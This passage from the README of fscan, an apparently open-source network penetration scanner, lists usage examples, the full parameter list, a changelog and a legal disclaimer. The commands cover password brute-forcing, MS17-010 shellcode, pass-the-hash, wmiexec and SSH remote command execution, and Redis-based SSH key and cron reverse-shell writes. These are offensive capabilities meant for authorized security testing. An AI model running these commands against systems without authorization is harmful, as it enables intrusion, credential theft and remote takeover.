fscan.exe -u http://baidu.com -proxy 8080 (Scan a url and set http proxy http://127.0.0.1:8080)
fscan.exe -h 192.168.1.1/24 -nobr -nopoc (Do not blast, do not scan Web poc, to reduce traffic)
fscan.exe -h 192.168.1.1/24 -pa 3389 (Join 3389->rdp scan)
fscan.exe -h 192.168.1.1/24 -socks5 127.0.0.1:1080 (Proxy only supports simple tcp functions, and libraries with some functions do not support proxy settings)
fscan.exe -h 192.168.1.1/24 -m ms17010 -sc add (Built-in functions such as adding users are only applicable to alternative tools, and other special tools for using ms17010 are recommended)
fscan.exe -h 192.168.1.1/24 -m smb2 -user admin -hash xxxxx (Hash collision)
fscan.exe -h 192.168.1.1/24 -m wmiexec -user admin -pwd password -c xxxxx(Wmiexec module no echo command execution)
```
Compile command
```
go build -ldflags="-s -w " -trimpath main.go
upx -9 fscan.exe (Optional, compressed)
```
Installation for arch users
`yay -S fscan-git or paru -S fscan-git`
Full parameters
```
Usage of ./fscan:
-br int
Brute threads (default 1)
-c string
exec command (ssh|wmiexec)
-cookie string
set poc cookie,-cookie rememberMe=login
-debug int
every time to LogErr (default 60)
-dns
using dnslog poc
-domain string
smb domain
-full
poc full scan,as: shiro 100 key
-h string
IP address of the host you want to scan,for example: 192.168.11.11 | 192.168.11.11-255 | 192.168.11.11,192.168.11.12
-hash string
hash
-hf string
host file, -hf ip.txt
-hn string
the hosts no scan,as: -hn 192.168.1.1/24
-m string
Select scan type ,as: -m ssh (default "all")
-no
not to save output log
-nobr
not to Brute password
-nopoc
not to scan web vul
-np
not to ping
-num int
poc rate (default 20)
-o string
Outputfile (default "result.txt")
-p string
Select a port,for example: 22 | 1-65535 | 22,80,3306 (default "21,22,80,81,135,139,443,445,1433,1521,3306,5432,6379,7001,8000,8080,8089,9000,9200,11211,27017")
-pa string
add port base DefaultPorts,-pa 3389
-path string
fcgi、smb romote file path
-ping
using ping replace icmp
-pn string
the ports no scan,as: -pn 445
-pocname string
use the pocs these contain pocname, -pocname weblogic
-pocpath string
poc file path
-portf string
Port File
-proxy string
set poc proxy, -proxy http://127.0.0.1:8080
-pwd string
password
-pwda string
add a password base DefaultPasses,-pwda password
-pwdf string
password file
-rf string
redis file to write sshkey file (as: -rf id_rsa.pub)
-rs string
redis shell to write cron file (as: -rs 192.168.1.1:6666)
-sc string
ms17 shellcode,as -sc add
-silent
silent scan
-socks5 string
set socks5 proxy, will be used in tcp connection, timeout setting will not work
-sshkey string
sshkey file (id_rsa)
-t int
Thread nums (default 600)
-time int
Set timeout (default 3)
-top int
show live len top (default 10)
-u string
url
-uf string
urlfile
-user string
username
-usera string
add a user base DefaultUsers,-usera user
-userf string
username file
-wmi
start wmi
-wt int
Set web timeout (default 5)
```
# 4. Demo
`fscan.exe -h 192.168.x.x (Open all functions, ms17010, read network card information)`
![](image/1.png)
![](image/4.png)
`fscan.exe -h 192.168.x.x -rf id_rsa.pub (Redis write public key)`
![](image/2.png)
`fscan.exe -h 192.168.x.x -c "whoami;id" (ssh command)`
![](image/3.png)
`fscan.exe -h 192.168.x.x -p80 -proxy http://127.0.0.1:8080 (Support for xray poc)`
![](image/2020-12-12-13-34-44.png)
`fscan.exe -h 192.168.x.x -p 139 (Netbios detection, domain control identification, the [+]DC in the figure below represents domain control)`
![](image/netbios.png)
`go run .\main.go -h 192.168.x.x/24 -m netbios (Show complete netbios information)`
![](image/netbios1.png)
`go run .\main.go -h 192.0.0.0/8 -m icmp(Detect the gateway and several random IPs of each segment C, and count the number of surviving top 10 segments B and C)`
![img.png](image/live.png)
# 5. Disclaimer
This tool is only for **legally authorized** enterprise security construction activities. If you need to test the usability of this tool, please build a target machine environment by yourself.
In order to avoid being used maliciously, all pocs included in this project are theoretical judgments of vulnerabilities, there is no process of exploiting vulnerabilities, and no real attacks and exploits will be launched on the target.
When using this tool for detection, you should ensure that the behavior complies with local laws and regulations, and you have obtained sufficient authorization. **Do not scan unauthorized targets**.
If you have any illegal acts during the use of this tool, you shall bear the corresponding consequences by yourself, and we will not bear any legal and joint liability.
Before installing and using this tool, please **be sure to carefully read and fully understand the content of each clause**. Restrictions, exemption clauses or other clauses involving your major rights and interests may remind you to pay attention in the form of bold, underline, etc. .
Unless you have fully read, fully understood and accepted all the terms of this agreement, please do not install and use this tool. Your use behavior or your acceptance of this agreement in any other express or implied way shall be deemed to have read and agreed to be bound by this agreement.
# 6. 404StarLink 2.0 - Galaxy
![](https://github.com/knownsec/404StarLink-Project/raw/master/logo.png)
Fscan is the member of 404Team [404StarLink2.0](https://github.com/knownsec/404StarLink2.0-Galaxy)If you have any questions about fscan or want to find a partner to communicate with, you can adding groups.
- [https://github.com/knownsec/404StarLink2.0-Galaxy#community](https://github.com/knownsec/404StarLink2.0-Galaxy#community)
# 7. Star Chart
[![Stargazers over time](https://starchart.cc/shadow1ng/fscan.svg)](https://starchart.cc/shadow1ng/fscan)
# 8. Donation
If you think this project is helpful to you, invite the author to have a drink🍹 [click](image/sponsor.png)
# 9. Reference links
https://github.com/Adminisme/ServerScan
https://github.com/netxfly/x-crack
https://github.com/hack2fun/Gscan
https://github.com/k8gege/LadonGo
https://github.com/jjf012/gopoc
# 10. Dynamics
2022/11/19 Add hash collision, wmiexec echo free command execution function
2022/7/14 Add -hf parameter, support host: port and host/xx: port formats, rule.Search regular matching range is changed from body to header+body, and -nobr no longer includes -nopoc. Optimize webtitle output format.
2022/7/6 Add manual gc recycling to try to save useless memory, -Urls support comma separation. Fix a poc module bug- Nobr no longer contains nopoc.
2022/7/2 Strengthen the poc fuzzy module to support running backup files, directories, shiro keys (10 keys by default, 100 keys with the -full parameter), etc.Add ms17017 (use parameter: -sc add), which can be used in ms17010 exp Go defines the shell code, and built-in functions such as adding users.
Add poc and fingerprint. Socks5 proxy is supported. Because the body fingerprint is more complete, the icon icon is no longer running by default.
2022/4/20 The poc module adds the specified directory or file -path poc path, the port can specify the file -portf port.txt, the rdp module adds the multi-threaded explosion demo, and -br xx specifies the thread.
2022/2/25 Add - m webonly to skip port scanning and directly access http. Thanks @ AgeloVito
2022/1/11 Add oracle password explosion.
2022/1/7 When scanning IP/8, each C segment gateway and several random IPs will be scanned by default. Recommended parameter: -h ip/8 -m icmp. The LiveTop function is added. When detecting the survival, the number of B and C segment IPs of top10 will be output by default.
2021/12/7 Add rdp scanning and port parameter -pa 3389 (the port will be added based on the original port list)
2021/12/1 Optimize the xray parsing module, support groups, add poc, add https judgment (tls handshake package), optimize the ip parsing module (support all ip/xx), add the blasting shutdown parameter nobr, add the skip certain ip scanning function -hn 192.168.1.1, add the skip certain port scanning function - pn 21445, and add the scan Docker unauthorized vulnerability.
2021/6/18 Improve the poc mechanism. If the fingerprint is identified, the poc will be sent according to the fingerprint information. If the fingerprint is not identified, all poc will be printed once.
2021/5/29 Adding the fcgi protocol to execute the scan of unauthorized commands, optimizing the poc module, optimizing the icmp module, and adding the ssh module to the private key connection.
2021/5/15 Added win03 version (deleted xray_poc module), added silent scanning mode, added web fingerprint, fixed netbios module array overrun, added a CheckErrs dictionary, and added gzip decoding to webtitle.
2021/5/6 Update mod library, poc and fingerprint. Modify thread processing mechanism, netbios detection, domain control identification module, webtitle encoding module, etc.
2021/4/22 Modify webtitle module and add gbk decoding.
2021/4/21 Add netbios detection and domain control identification functions.
2021/3/4 Support -u url and -uf parameters, support batch scan URLs.
2021/2/25 Modify the yaml parsing module to support password explosion, such as tomcat weak password. The new sets parameter in yaml is an array, which is used to store passwords. See tomcat-manager-week.yaml for details.
2021/2/8 Add fingerprint identification function to identify common CMS and frameworks, such as Zhiyuan OA and Tongda OA.
2021/2/5 Modify the icmp packet mode, which is more suitable for large-scale detection.
Modify the error prompt. If there is no new progress in - debug within 10 seconds, the current progress will be printed every 10 seconds.
2020/12/12 The yaml parsing engine has been added to support the poc of xray. By default, all the poc are used (the poc of xray has been filtered). You can use - pocname weblogic, and only one or some poc is used. Need go version 1.16 or above, and can only compile the latest version of go for testing.
2020/12/6 Optimize the icmp module and add the -domain parameter (for the smb blasting module, applicable to domain users)
2020/12/03 Optimize the ip segment processing module, icmp, port scanning module. 192.168.1.1-192.168.255.255 is supported.
2020/11/17 The -ping parameter is added to replace icmp packets with ping in the survival detection module.
2020/11/17 WebScan module and shiro simple recognition are added. Skip certificate authentication during https access. Separate the timeout of the service module and the web module, and add the -wt parameter (WebTimeout).
2020/11/16 Optimize the icmp module and add the -it parameter (IcmpThreads). The default value is 11000, which is suitable for scanning section B.
2020/11/15 Support importt ip from file, -hf ip.txt, and process de duplication ips.
[url-doczh]: README.md